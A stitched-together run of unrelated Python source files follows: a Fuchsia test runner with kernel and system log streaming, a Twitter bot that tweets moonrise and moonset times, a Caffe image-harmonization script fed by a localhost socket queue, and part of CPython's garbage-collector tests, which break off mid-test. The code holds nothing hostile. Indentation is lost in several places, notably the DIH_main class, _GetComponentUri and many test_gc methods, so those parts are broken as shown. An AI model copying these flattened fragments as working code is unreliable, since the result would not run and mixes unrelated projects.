_JOIN_TIMEOUT_SECS = 5
def _AttachKernelLogReader(target):
  """Attaches a kernel log reader as a long-running SSH task.

  target: The Target device to read the kernel log from.

  Returns the process object streaming 'dlog -f' output on stdout
  (stderr is folded into stdout)."""

  logging.info('Attaching kernel logger.')
  return target.RunCommandPiped(['dlog', '-f'],
                                stdin=open(os.devnull, 'r'),
                                stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
class SystemLogReader(object):
  """Collects and symbolizes Fuchsia system log to a file.

  Intended for use as a context manager: Start() launches the log_listener
  and symbolizer processes, __exit__ tears them down."""

  def __init__(self):
    self._listener_proc = None
    self._symbolizer_proc = None
    self._system_log = None

  def __enter__(self):
    return self

  def __exit__(self, exc_type, exc_val, exc_tb):
    """Stops the system logging processes and closes the output file."""
    # Kill the symbolizer before its input source so it doesn't read from a
    # dead pipe; close the output file last.
    if self._symbolizer_proc:
      self._symbolizer_proc.kill()
    if self._listener_proc:
      self._listener_proc.kill()
    if self._system_log:
      self._system_log.close()

  def Start(self, target, package_paths, system_log_file):
    """Start a system log reader as a long-running SSH task.

    target: The Target to run 'log_listener' on.
    package_paths: .far packages whose build IDs drive symbolization.
    system_log_file: Path of the file receiving the symbolized log."""
    logging.debug('Writing fuchsia system log to %s' % system_log_file)

    self._listener_proc = target.RunCommandPiped(['log_listener'],
                                                 stdout=subprocess.PIPE,
                                                 stderr=subprocess.STDOUT)

    # Line-buffered so log lines land on disk promptly.
    self._system_log = open(system_log_file, 'w', buffering=1)

    self._symbolizer_proc = RunSymbolizer(self._listener_proc.stdout,
                                          self._system_log,
                                          BuildIdsPaths(package_paths))
class MergedInputStream(object):
  """Merges a number of input streams into a UNIX pipe on a dedicated thread.

  Terminates when the file descriptor of the primary stream (the first in
  the sequence) is closed."""

  def __init__(self, streams):
    assert len(streams) > 0
    self._streams = streams
    self._output_stream = None
    self._thread = None

  def Start(self):
    """Returns a pipe to the merged output stream."""

    read_pipe, write_pipe = os.pipe()

    # Disable buffering for the stream to make sure there is no delay in logs.
    # NOTE(review): os.fdopen(fd, 'w', 0) is only legal on Python 2 — Python 3
    # rejects unbuffered text mode. This file is py2-era (print_function
    # import); confirm before migrating.
    self._output_stream = os.fdopen(write_pipe, 'w', 0)
    self._thread = threading.Thread(target=self._Run)
    self._thread.start()
    return os.fdopen(read_pipe, 'r')

  def _Run(self):
    streams_by_fd = {}
    primary_fd = self._streams[0].fileno()
    for s in self._streams:
      streams_by_fd[s.fileno()] = s

    # Set when the primary FD is closed. Input from other FDs will continue to
    # be processed until select() runs dry.
    # NOTE(review): |flush| is never set True anywhere in this class, so the
    # `and flush` break below can never trigger — looks like dead code from an
    # earlier revision; confirm.
    flush = False

    # The lifetime of the MergedInputStream is bound to the lifetime of
    # |primary_fd|.
    # NOTE(review): the loop condition also exits if the primary fd happens
    # to be 0 (stdin) — `primary_fd is not None` would be safer; confirm.
    while primary_fd:
      # When not flushing: block until data is read or an exception occurs.
      rlist, _, xlist = select.select(streams_by_fd, [], streams_by_fd)

      if len(rlist) == 0 and flush:
        break

      # Drop any stream that reported an exceptional condition.
      for fileno in xlist:
        del streams_by_fd[fileno]
        if fileno == primary_fd:
          primary_fd = None

      for fileno in rlist:
        line = streams_by_fd[fileno].readline()
        if line:
          # NOTE(review): readline() on a text stream already includes the
          # trailing newline, so `+ '\n'` may double-space output — confirm
          # against the stream mode used by callers.
          self._output_stream.write(line + '\n')
        else:
          # EOF on this stream: stop watching it.
          del streams_by_fd[fileno]
          if fileno == primary_fd:
            primary_fd = None

    # Flush the streams by executing nonblocking reads from the input file
    # descriptors until no more data is available, or all the streams are
    # closed.
    while streams_by_fd:
      rlist, _, _ = select.select(streams_by_fd, [], [], 0)

      if not rlist:
        break

      for fileno in rlist:
        line = streams_by_fd[fileno].readline()
        if line:
          self._output_stream.write(line + '\n')
        else:
          del streams_by_fd[fileno]
def _GetComponentUri(package_name):
return 'fuchsia-pkg://fuchsia.com/%s#meta/%s.cmx' % (package_name,
package_name)
class RunTestPackageArgs:
  """RunTestPackage() configuration arguments structure.

  system_logging: If set, connects a system log reader to the target.
  test_realm_label: Specifies the realm name that run-test-component should
    use. This must be specified if a filter file is to be set, or a results
    summary file fetched after the test suite has run.
  use_run_test_component: If True then the test package will be run
    hermetically via 'run-test-component', rather than using 'run'.
  """

  def __init__(self):
    self.test_realm_label = None
    self.system_logging = False
    self.use_run_test_component = False

  @staticmethod
  def FromCommonArgs(args):
    """Builds a RunTestPackageArgs from parsed command-line |args|."""
    parsed = RunTestPackageArgs()
    parsed.system_logging = args.include_system_logs
    return parsed
def _DrainStreamToStdout(stream, quit_event):
  """Outputs the contents of |stream| until |quit_event| is set."""

  while not quit_event.is_set():
    # Poll with a short timeout so the quit event is checked regularly.
    readable, _, _ = select.select([stream], [], [], 0.1)
    if not readable:
      continue
    next_line = readable[0].readline()
    if not next_line:
      # EOF: the stream was closed on the other end.
      return
    print(next_line.rstrip())
def RunTestPackage(output_dir, target, package_paths, package_name,
                   package_args, args):
  """Installs the Fuchsia package at |package_path| on the target,
  executes it with |package_args|, and symbolizes its output.

  output_dir: The path containing the build output files.
  target: The deployment Target object that will run the package.
  package_paths: The paths to the .far packages to be installed.
  package_name: The name of the primary package to run.
  package_args: The arguments which will be passed to the Fuchsia process.
  args: RunTestPackageArgs instance configuring how the package will be run.

  Returns the exit code of the remote package process."""

  system_logger = (_AttachKernelLogReader(target)
                   if args.system_logging else None)
  try:
    if system_logger:
      # Spin up a thread to asynchronously dump the system log to stdout
      # for easier diagnoses of early, pre-execution failures.
      log_output_quit_event = multiprocessing.Event()
      log_output_thread = threading.Thread(target=lambda: _DrainStreamToStdout(
          system_logger.stdout, log_output_quit_event))
      log_output_thread.daemon = True
      log_output_thread.start()

    with target.GetAmberRepo():
      target.InstallPackage(package_paths)

      if system_logger:
        # Stop the early drain thread; from here on the kernel log is
        # merged into the process output stream below.
        log_output_quit_event.set()
        log_output_thread.join(timeout=_JOIN_TIMEOUT_SECS)

      logging.info('Running application.')
      # Choose hermetic 'run-test-component' vs. plain 'run' per |args|.
      if args.use_run_test_component:
        command = ['run-test-component']
        if args.test_realm_label:
          command += ['--realm-label=%s' % args.test_realm_label]
      else:
        command = ['run']
      command += [_GetComponentUri(package_name)] + package_args

      process = target.RunCommandPiped(command,
                                       stdin=open(os.devnull, 'r'),
                                       stdout=subprocess.PIPE,
                                       stderr=subprocess.STDOUT)

      if system_logger:
        # Interleave the kernel log with the test process output.
        output_stream = MergedInputStream(
            [process.stdout, system_logger.stdout]).Start()
      else:
        output_stream = process.stdout

      # Run the log data through the symbolizer process.
      output_stream = SymbolizerFilter(output_stream,
                                       BuildIdsPaths(package_paths))

      for next_line in output_stream:
        print(next_line.rstrip())

      process.wait()
      if process.returncode == 0:
        logging.info('Process exited normally with status code 0.')
      else:
        # The test runner returns an error status code if *any* tests fail,
        # so we should proceed anyway.
        logging.warning('Process exited with status code %d.' %
                        process.returncode)
  finally:
    if system_logger:
      logging.info('Terminating kernel log reader.')
      log_output_quit_event.set()
      log_output_thread.join()
      system_logger.kill()

  return process.returncode
|
lunartime.py | import json
import logging
import threading
from const import DATA_FILE_EXT, UTC
from datetime import datetime, time, timedelta
from envvarname import EnvVarName
from pathlib import Path
from pylunar import MoonInfo
from pytz import timezone, utc
from time import sleep
from twitter import TwitterUtil
from typing import Dict
from util import decToDegMinSec, getEnvVar, initDataDir, isEmpty, tupleToDateTime
class LunarTimeTask(object):
    """Background task that tweets moonrise/moonset info shortly before moonrise.

    A daemon thread computes lunar times via pylunar for the configured
    location, tweets at most once per lunar day (deduplicated through a saved
    data file keyed on the transit time), then sleeps until the next window.
    """

    LOGGER = logging.getLogger()
    _TASK_NAME = "lunartime"
    # Clock format used for moonrise/moonset in the tweet text.
    _TIME_FORMAT = "%I:%M %p"
    _MESSAGE_TEMPLATE = "Hello {}! The moon will be {}% illuminated. Moonrise is at {} and Moonset is at {}."
    # Tweet no earlier than this many seconds before moonrise.
    _THRESHOLD_SECONDS = 3600

    def __init__(self):
        """
        Constructor for the Lunar Time Task. This task is responsible for
        determining the desired information to publish.
        """
        self._thread = threading.Thread(name=self._TASK_NAME, target=self._run, args=())
        self._thread.daemon = True  # Daemonize thread
        self._thread.start()  # Start the execution

    def _run(self):
        # Thread entry point: configure from environment, then loop forever.
        self.LOGGER.info("Starting the '" + self._TASK_NAME + "' task")
        self._setup()
        """ Routine that runs forever """
        while True:
            self.now = self._tzone.localize(datetime.now())
            self.LOGGER.info("Getting lunar times for now {}".format(self.now.isoformat()))
            lunar_time_current = self._getLunarTimeCurrent()
            moonrise_current = lunar_time_current["rise"]

            # Get prior 'lunar_time' from the saved data file
            lunar_time_from_file = self._loadLunarTime()
            if (lunar_time_from_file):
                transit_from_file = datetime.fromisoformat(lunar_time_from_file["transit"])
                self.LOGGER.info("Got lunar times from file for {}".format(transit_from_file.isoformat()))
                # Same transit as last run means this lunar day was already tweeted.
                if (transit_from_file == lunar_time_current["transit"]):
                    self.LOGGER.info("Current lunar times are the same as the file")
                    self._sleep(moonrise_current)
                    continue

            # Only tweet within the [-threshold, 0] window before moonrise.
            threshold_before_moonrise_current = moonrise_current - timedelta(seconds=self._THRESHOLD_SECONDS)
            if (self.now < threshold_before_moonrise_current or moonrise_current < self.now):
                self.LOGGER.info("Now is not within the threshold before moonrise")
                self._sleep(moonrise_current)
                continue

            self._tweetLunarTime(lunar_time_current)
            self._saveLunarTime(lunar_time_current)
            self._sleep(moonrise_current)

    def _setup(self):
        """Reads required configuration from environment variables; raises on any missing value."""
        # Data Directory
        self._data_dir = initDataDir(self._TASK_NAME)

        # Latitude (stored as a (deg, min, sec) tuple for pylunar)
        latitude_str = getEnvVar(EnvVarName.LATITUDE)
        if isEmpty(latitude_str):
            raise RuntimeError("Missing required environment variable: " + EnvVarName.LATITUDE.name)
        self._latitude_dms = decToDegMinSec(float(latitude_str))
        self.LOGGER.debug("Latitude = " + ','.join(map(str, self._latitude_dms)))

        # Longitude (stored as a (deg, min, sec) tuple for pylunar)
        longitude_str = getEnvVar(EnvVarName.LONGITUDE)
        if isEmpty(longitude_str):
            raise RuntimeError("Missing required environment variable: " + EnvVarName.LONGITUDE.name)
        self._longitude_dms = decToDegMinSec(float(longitude_str))
        self.LOGGER.debug("Longitude = " + ','.join(map(str, self._longitude_dms)))

        # Location (human-readable name used in the tweet)
        self._location_str = getEnvVar(EnvVarName.LOCATION)
        if isEmpty(self._location_str):
            raise RuntimeError("Missing required environment variable: " + EnvVarName.LOCATION.name)
        self.LOGGER.debug("Location = " + self._location_str)

        # Timezone
        self._timezone_str = getEnvVar(EnvVarName.TIMEZONE)
        if isEmpty(self._timezone_str):
            raise RuntimeError("Missing required environment variable: " + EnvVarName.TIMEZONE.name)
        self._tzone = timezone(self._timezone_str)
        self.LOGGER.debug("Timezone = " + self._timezone_str)

    def _getLunarTimeCurrent(self) -> Dict:
        """Returns the lunar-time dict for the current (or next) lunar day."""
        lunar_time_now = self._getLunarTime(self.now, True)
        # If today's transit already passed, advance to tomorrow's lunar day.
        if (lunar_time_now["transit"] < self.now):
            lunarTimeTomorrow = self._getLunarTimeTomorrow(self.now)
            return self._getLunarTime(lunarTimeTomorrow["transit"], True)
        return self._getLunarTime(lunar_time_now["transit"], True)

    def _getLunarTime(self, asOf: datetime, doFinalCorrections: bool) -> Dict:
        """Computes rise/transit/set/fraction as of *asOf* using pylunar."""
        utcAsOf = utc.normalize(asOf)
        # pylunar's MoonInfo.update expects a (Y, M, D, h, m, s) UTC tuple.
        utcAsOfTuple = (
            utcAsOf.year,
            utcAsOf.month,
            utcAsOf.day,
            utcAsOf.hour,
            utcAsOf.minute,
            utcAsOf.second
        )
        moon_info = MoonInfo(self._latitude_dms, self._longitude_dms)
        moon_info.update(utcAsOfTuple)
        moon_times = moon_info.rise_set_times(self._timezone_str)
        return self._getLunarTimeFromMoonTimes(moon_times, asOf, moon_info.fractional_phase(), doFinalCorrections)

    def _getLunarTimeFromMoonTimes(self,
                                   moonTimes: list,
                                   asOf: datetime,
                                   fractPhase: float,
                                   doFinalCorrections: bool) -> Dict:
        """Converts pylunar rise_set_times output into the task's lunar-time dict.

        Missing events (pylunar reports a non-tuple for events that do not
        occur on the asOf date) are filled in from the adjacent day.
        """
        lunarTimeDict = {
            "asOf": asOf,
            "rise": None,
            "transit": None,
            "fraction": fractPhase,
            "set": None
        }
        for moonTime in moonTimes:
            infoType = moonTime[0]
            infoTuple = moonTime[1]
            if (infoType == "rise" and type(infoTuple) is tuple):
                lunarTimeDict["rise"] = tupleToDateTime(infoTuple, self._tzone)
            if (infoType == "transit" and type(infoTuple) is tuple):
                lunarTimeDict["transit"] = tupleToDateTime(infoTuple, self._tzone)
            if (infoType == "set" and type(infoTuple) is tuple):
                lunarTimeDict["set"] = tupleToDateTime(infoTuple, self._tzone)

        # Fixes for lunar times that do not occur on the asOf date
        if ((lunarTimeDict["rise"] is None)
                or (lunarTimeDict["transit"] is None)
                or (lunarTimeDict["set"] is None)):
            tomorrowLunarTime = self._getLunarTimeTomorrow(asOf)
            if (lunarTimeDict["rise"] is None):
                lunarTimeDict["rise"] = tomorrowLunarTime["rise"]
            if (lunarTimeDict["transit"] is None):
                lunarTimeDict["transit"] = tomorrowLunarTime["transit"]
            if (lunarTimeDict["set"] is None):
                lunarTimeDict["set"] = tomorrowLunarTime["set"]

        # Final corrections (only if prescribed): keep rise <= transit <= set
        # by borrowing the rise from yesterday / the set from tomorrow.
        if (doFinalCorrections):
            if (lunarTimeDict["rise"] > lunarTimeDict["transit"]):
                yesterdayLunarTime = self._getLunarTimeYesterday(asOf)
                lunarTimeDict["rise"] = yesterdayLunarTime["rise"]
            if (lunarTimeDict["set"] < lunarTimeDict["transit"]):
                tomorrowLunarTime = self._getLunarTimeTomorrow(asOf)
                lunarTimeDict["set"] = tomorrowLunarTime["set"]

        return lunarTimeDict

    def _getLunarTimeYesterday(self, asOfToday: datetime) -> Dict:
        """Lunar times as of the last second of the previous calendar day."""
        yesterdayDate = asOfToday.date() - timedelta(days=1)
        yesterdayDateTime = self._tzone.localize(datetime.combine(yesterdayDate, time(23,59,59)))
        return self._getLunarTime(yesterdayDateTime, False)

    def _getLunarTimeTomorrow(self, asOfToday: datetime) -> Dict:
        """Lunar times as of midnight at the start of the next calendar day."""
        tomorrowDate = asOfToday.date() + timedelta(days=1)
        tomorrowDateTime = self._tzone.localize(datetime.combine(tomorrowDate, time()))
        return self._getLunarTime(tomorrowDateTime, False)

    def _tweetLunarTime(self, lunar_time) -> None:
        """Formats the lunar-time dict into the message template and tweets it."""
        message = self._MESSAGE_TEMPLATE.format(
            self._location_str,
            str(round(100 * lunar_time["fraction"])),
            lunar_time["rise"].strftime(self._TIME_FORMAT),
            lunar_time["set"].strftime(self._TIME_FORMAT)
        )
        self.LOGGER.info("A message will be tweeted!")
        self.LOGGER.info(message)
        TwitterUtil.tweet(message)

    def _sleep(self, moonrise: datetime) -> None:
        """Sleeps until the threshold window before the given (or next) moonrise."""
        seconds_until_moonrise = (moonrise - self.now).total_seconds()
        if (seconds_until_moonrise > self._THRESHOLD_SECONDS):
            # Moonrise is still ahead: wake at the start of the tweet window.
            self.LOGGER.info("Sleeping until later this time")
            sleep_seconds = seconds_until_moonrise - self._THRESHOLD_SECONDS
        else:
            # Window passed: estimate the next day's moonrise and sleep to
            # the start of its window instead.
            self.LOGGER.info("Sleeping until next time")
            next_lunar = moonrise + timedelta(days=1)
            lunar_time_next = self._getLunarTime(next_lunar, False)
            moonrise_next = lunar_time_next["rise"]
            seconds_until_moonrise_next = (moonrise_next - self.now).total_seconds()
            sleep_seconds = seconds_until_moonrise_next - self._THRESHOLD_SECONDS
        self.LOGGER.info("Sleep for {:.0f} seconds".format(sleep_seconds))
        sleep(sleep_seconds)

    def _loadLunarTime(self) -> Dict:
        """Loads the last-tweeted lunar-time dict from disk, or None if unavailable."""
        filePath = Path(self._data_dir + self._TASK_NAME + DATA_FILE_EXT)
        filePath.touch(exist_ok=True)
        with open(filePath, 'r') as fp:
            try:
                # TODO: convert datetime string into datetime object
                lunar_time = json.load(fp)
                return lunar_time
            except:
                # NOTE(review): bare except treats any parse/IO error as
                # "no saved state" — intentional best-effort, but it also
                # hides unexpected bugs; consider narrowing to
                # json.JSONDecodeError.
                return None

    def _saveLunarTime(self, lunar_time: Dict) -> None:
        """Persists the lunar-time dict to disk (datetimes stringified)."""
        fw = open(self._data_dir + self._TASK_NAME + DATA_FILE_EXT, 'w+')
        json.dump(lunar_time, fw, default=self._dumpConverter, indent=2)
        fw.close()

    def _dumpConverter(self, o):
        # json.dump fallback: stringify datetime objects.
        # NOTE(review): implicitly returns None (serialized as null) for any
        # other unhandled type instead of raising TypeError — confirm intended.
        if isinstance(o, datetime):
            return o.__str__()
|
DIH_fast.py | #!/usr/bin/env python
import sys
sys.path.append('/root/caffe/python')
import caffe
import numpy as np
from PIL import Image
import os
import time
import cv2
import numpy as np
import scipy as sp
import scipy.ndimage
import socket
import socketserver # socketserver in Python 3+
import time
from queue import Queue
from threading import Thread
# class for handling requests
class QueueHandler(socketserver.BaseRequestHandler):
    """Request handler that enqueues each received block of data on the server.

    NOTE(review): assigning client_address onto the *server* object gets
    overwritten on every new connection — it looks unused; confirm before
    relying on it.
    """

    def __init__(self, request, client_address, server):
        self.server = server
        server.client_address = client_address
        socketserver.BaseRequestHandler.__init__(self,request, client_address, server)

    # receive a block of data (up to 4096 bytes),
    # put it in the server's Queue instance,
    # send back the block of data (redundant echo for the client)
    def handle(self):
        data = self.request.recv(4096)
        self.server.recv_q.put(data)
        self.request.send(data)
# define the TCP server
class TCPServer(socketserver.TCPServer):
    """TCP server that funnels all received data blocks into a Queue.

    Constructed with bind_and_activate=False so SO_REUSEADDR can be set
    before binding, allowing quick restarts on the same port.
    """

    def __init__(self, ip, port, handler_class=QueueHandler):
        socketserver.TCPServer.__init__(self, (ip, port), handler_class, bind_and_activate=False)
        self.recv_q = Queue()  # a Queue for data received over the socket
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server_bind()
        self.server_activate()

    def shutdown(self):
        # Delegate to the base class; stops the serve_forever() loop.
        socketserver.TCPServer.shutdown(self)

    def __del__(self):
        # Close the listening socket when the server object is collected.
        self.server_close()
class DIH_main(object):
def __init__(self):
self.value = 1
# create and instance of the server attached to some port
self.server = TCPServer("localhost",9999)
# start it listening in a separate control thread
self.server_thread = Thread(target=self.server.serve_forever)
self.server_thread.start()
self.stop = False
# result folder
folder_name = 'DIH_output/'
if os.path.isdir(folder_name):
pass
else:
os.makedirs(folder_name)
# set up caffe
caffe.set_device(0)
caffe.set_mode_gpu()
# load net
self.net = caffe.Net('../models/deploy_512.prototxt',
'../models/harmonize_iter_200000.caffemodel', caffe.TEST)
def add_one_to_value(self):
self.value += 1
#crop the image: allowed values for center: 256, 621, 986
def crop_image(self, image,center):
car_cropped = image[0:375,center-256:center+256,:]
car_padded = cv2.copyMakeBorder( car_cropped, 137, 0, 0, 0, cv2.BORDER_CONSTANT)
return car_padded
# takes a cropped image and a background, pastes the cropped image onto the backgroud based with the center at <center> pixels from the left
def restore_image(self, im_cropped,im_original,center):
car_depadded = im_cropped[137:512,0:512]
im_original[0:375,center-256:center+256,:] = car_depadded
return im_original
# creates a binary mask from the <car> object
def create_mask(self, car):
im_in = cv2.cvtColor(car,cv2.COLOR_RGB2GRAY)
# Threshold.
# Set values equal to or above 0 to 0.
# Set values below 0 to 255.
th, im_th = cv2.threshold(im_in, 0, 255, cv2.THRESH_BINARY)
filled = sp.ndimage.binary_fill_holes(im_th).astype(int)
mask = filled*255
mask = mask.astype('uint8')
return mask
# uses mask to paste a car object onto a background
def create_composite(self, car,mask,background):
color_mask = cv2.cvtColor(mask,cv2.COLOR_GRAY2RGB)
background = cv2.subtract(background,color_mask)
composite = cv2.add(background,car)
return composite
# harmonizes the <composite> with <mask> using DIH
def harmonize(self,composite,mask):
size = (512, 512)
# switch to BGR, subtract mean, and make dims C x H x W for Caffe
im = cv2.resize(composite,size, interpolation = cv2.INTER_CUBIC)
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
im = im.astype('float32')
if im.shape[2] == 4:
im = im[:, :, 0:3]
im = im[:, :, ::-1]
im -= np.array((104.00699, 116.66877, 122.67892))
im = im.transpose((2, 0, 1))
mask = cv2.resize(mask,size, interpolation = cv2.INTER_CUBIC)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2RGB)
mask = mask.astype('float32')
if len(mask.shape) == 3:
mask = mask[:, :, 0]
mask -= 128.0
mask = mask[np.newaxis, ...]
# shape for input (data blob is N x C x H x W), set data
self.net.blobs['data'].reshape(1, *im.shape)
self.net.blobs['data'].data[...] = im
self.net.blobs['mask'].reshape(1, *mask.shape)
self.net.blobs['mask'].data[...] = mask
# run net for prediction
self.net.forward()
out = self.net.blobs['output-h'].data[0]
out = out.transpose((1, 2, 0))
out += np.array((104.00699, 116.66877, 122.67892))
out = out[:, :, ::-1]
neg_idx = out < 0.0
out[neg_idx] = 0.0
pos_idx = out > 255.0
out[pos_idx] = 255.0
# Get result
result = out.astype(np.uint8)
# Convert RGB to BGR and put in desired shape
result = result[:, :, ::-1].copy()
return result
def run(self):
    """Main processing loop.

    Polls the server's receive queue for filenames; for each one, splits
    the rendered-car image and its camera background into three 512x512
    crops (DIH's input size), masks/composites/harmonizes each crop, and
    stitches the results back into a full 1242x375 frame written to
    DIH_output/fastmode/.
    """
    while not self.stop:
        print ("Value =",self.value)
        # if there is stuff in the queue...
        while not self.server.recv_q.empty():
            # read and parse the filename from the queue
            filename = self.server.recv_q.get()
            filename = filename.decode()
            print(filename)
            # load the car and background image
            car_image = cv2.imread(filename)
            # NOTE(review): assumes paths look like <a>/<b>/<name> and that
            # the matching camera frame lives under original/ -- confirm.
            cam_im_path = 'original/' + filename.split('/')[2]
            camera_image = cv2.imread(cam_im_path)
            # split the images in 3 separate 512x512 images since this is
            # the input size of DIH (crops centered at x = 256, 621, 986)
            car1 = self.crop_image(car_image, 256)
            car2 = self.crop_image(car_image, 621)
            car3 = self.crop_image(car_image, 986)
            bg1 = self.crop_image(camera_image, 256)
            bg2 = self.crop_image(camera_image, 621)
            bg3 = self.crop_image(camera_image, 986)
            # create masks for each image
            mask1 = self.create_mask(car1)
            mask2 = self.create_mask(car2)
            mask3 = self.create_mask(car3)
            # create the composite for each image
            composite1 = self.create_composite(car1, mask1, bg1)
            composite2 = self.create_composite(car2, mask2, bg2)
            composite3 = self.create_composite(car3, mask3, bg3)
            # harmonize the composites
            DIH_result1 = self.harmonize(composite1, mask1)
            DIH_result2 = self.harmonize(composite2, mask2)
            DIH_result3 = self.harmonize(composite3, mask3)
            # concatenate the 3 images back to 1242x375
            total_result = self.restore_image(DIH_result1, camera_image, 256)
            total_result = self.restore_image(DIH_result2, total_result, 621)
            total_result = self.restore_image(DIH_result3, total_result, 986)
            # save the result
            cv2.imwrite('DIH_output/fastmode/' + filename.split('/')[2], total_result)
        # # perform some action based on the message
        # if filename == "shutdown":
        #     self.server.shutdown()
        #     self.stop = True
        time.sleep(1)
# Script entry point: build the DIH pipeline object and start its polling loop.
if __name__ == "__main__":
    #main()
    x = DIH_main()
    x.run()
test_gc.py | import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr, cpython_only, start_threads,
temp_dir, requires_type_collecting, TESTFN, unlink)
from test.support.script_helper import assert_python_ok, make_script
import sys
import time
import gc
import weakref
# Optional dependencies: threading may be absent on minimal builds, and
# _testcapi.with_tp_del only exists in CPython test builds.
try:
    import threading
except ImportError:
    threading = None
try:
    from _testcapi import with_tp_del
except ImportError:
    def with_tp_del(cls):
        # Fallback decorator: tests that need a legacy tp_del slot cannot
        # run without _testcapi, so instantiation fails loudly instead of
        # silently running a meaningless test.
        class C(object):
            def __new__(cls, *args, **kwargs):
                raise TypeError('requires _testcapi.with_tp_del')
        return C
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
    """Object carrying an id and a deliberate self-reference.

    The ``loop`` attribute points back at the instance itself, so the
    moment the object becomes unreachable it is cyclic trash that only
    the cyclic garbage collector can reclaim.
    """

    def __init__(self, i):
        self.loop = self  # self-reference: forms the one-object cycle
        self.i = i
class GC_Detector(object):
    """Detects whether a cyclic gc collection has run since construction.

    ``gc_happened`` stays False until the throwaway C1055820 cycle made
    here is reclaimed; the weakref callback then flips it to True.  Since
    the cycle can only be reclaimed by cyclic gc, the flag firing proves
    a collection took place.
    """

    def __init__(self):
        self.gc_happened = False

        def _mark(_ignored):
            self.gc_happened = True

        # Cyclic trash whose collection triggers the callback above.
        self.wr = weakref.ref(C1055820(666), _mark)
@with_tp_del
class Uncollectable(object):
    """Create a reference cycle with multiple __del__ methods.

    An object in a reference cycle will never have zero references,
    and so must be garbage collected. If one or more objects in the
    cycle have __del__ methods, the gc refuses to guess an order,
    and leaves the cycle uncollected.
    """

    def __init__(self, partner=None):
        # With no partner given, construct one pointing back at us so a
        # two-object cycle is closed in a single call.
        if partner is None:
            self.partner = Uncollectable(partner=self)
        else:
            self.partner = partner

    def __tp_del__(self):
        # The mere presence of a legacy tp_del finalizer is what makes the
        # containing cycle uncollectable (pre-PEP-442 semantics); the body
        # is irrelevant.
        pass
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@requires_type_collecting
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
